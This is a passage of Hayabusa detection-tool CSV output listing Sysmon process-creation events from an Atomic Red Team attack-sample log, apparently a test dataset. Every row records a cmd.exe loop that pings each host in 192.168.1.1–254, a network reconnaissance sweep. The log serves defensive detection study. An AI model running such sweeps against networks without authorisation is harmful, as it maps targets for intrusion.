/c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D8F9-5D31-0000-001073EA3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D8FF-5D31-0000-00100E1A3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 747F3D96-D902-5D31-0000-0010B2393400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D906-5D31-0000-001029513400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 747F3D96-D908-5D31-0000-0010C45F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 747F3D96-D90B-5D31-0000-001046713400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 747F3D96-D90E-5D31-0000-0010D4883400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:59.537 